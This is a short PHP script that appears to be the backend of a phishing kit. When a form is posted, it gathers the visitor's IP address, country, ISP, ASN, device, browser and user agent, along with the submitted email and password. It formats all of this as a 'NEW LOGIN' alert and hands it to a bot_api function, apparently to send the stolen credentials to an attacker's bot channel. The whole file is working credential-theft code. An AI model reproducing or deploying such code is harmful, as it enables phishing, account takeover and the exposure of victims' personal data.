<?php
session_start();
ob_start();

if($_SERVER['REQUEST_METHOD'] == 'POST'){

require_once(__DIR__ . '/config.php');
require_once(__DIR__ . '/includes/detect.php');
require_once(__DIR__ . '/includes/bot_api.php');


$text = '<blockquote> <b>IP:</b> <code>'.$_SESSION['user_data']['query'].'</code> </blockquote><blockquote> <b>🔔 NEW LOGIN</b> </blockquote>
<b>COUNTRY:</b> <code>'.$_SESSION['user_data']['countryCode'].'</code>
<b>ISP:</b> <code>'.$_SESSION['user_data']['isp'].'</code>
<b>ORG:</b> <code>'.$_SESSION['user_data']['org'].'</code>
<b>ASN:</b> <code>'.$_SESSION['user_data']['as'].'</code>
<b>DEVICE:</b> <code>'.$_SESSION['device'].'</code>
<b>BROWSER:</b> <code>'.$_SESSION['browser'].'</code>
<b>OS:</b> <code>'.$_SESSION['os'].'</code>
<b>USER AGENT:</b> <code>'.$_SERVER['HTTP_USER_AGENT'].'</code>

<blockquote><b>'.$_POST['detail'].'</b></blockquote>
<b>EMAIL:</b> <code>'.$_POST['email'].'</code>
<b>PASSWORD:</b> <code>'.$_POST['password'].'</code>';
bot_api($text);


}


?>